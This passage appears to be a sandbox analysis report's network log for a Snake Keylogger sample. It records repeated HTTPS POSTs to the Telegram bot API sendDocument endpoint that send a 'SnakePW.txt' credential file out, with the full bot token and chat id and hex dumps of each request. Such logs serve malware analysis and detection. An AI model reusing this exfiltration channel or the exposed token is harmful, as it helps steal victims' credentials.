                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:27 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:27 UTC197INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66875,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            117192.168.2.549969149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:27 UTC197OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f1b5550f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:27 UTC197OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 62 35 35 35 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f1b5550fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:28 UTC198INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:28 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:28 UTC198INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66876,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            118192.168.2.549970149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:28 UTC199OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f1f0f03d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:28 UTC199OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 66 30 66 30 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f1f0f03dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:28 UTC200INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:28 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:28 UTC200INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66877,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228808,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            119192.168.2.549972149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:28 UTC200OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f24462a8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:28 UTC201OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 34 34 36 32 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f24462a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:28 UTC201INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:28 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:28 UTC202INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66878,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228808,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.549780149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:43 UTC20OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d725a9d7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:43 UTC20OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 32 35 61 39 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d725a9d7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:43 UTC21INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:43 UTC21INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66758,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            120192.168.2.549973149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:29 UTC202OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f290ad11
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:29 UTC202OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 39 30 61 64 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f290ad11Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:29 UTC203INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:29 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:29 UTC203INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66880,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228809,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            121192.168.2.549974149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:29 UTC204OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f2c783aa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:29 UTC204OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 32 63 37 38 33 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f2c783aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:29 UTC205INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:29 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:29 UTC205INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66881,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228809,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            122192.168.2.549975149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:30 UTC206OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f3031ddf
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:30 UTC206OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 33 30 33 31 64 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f3031ddfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:30 UTC206INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:30 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
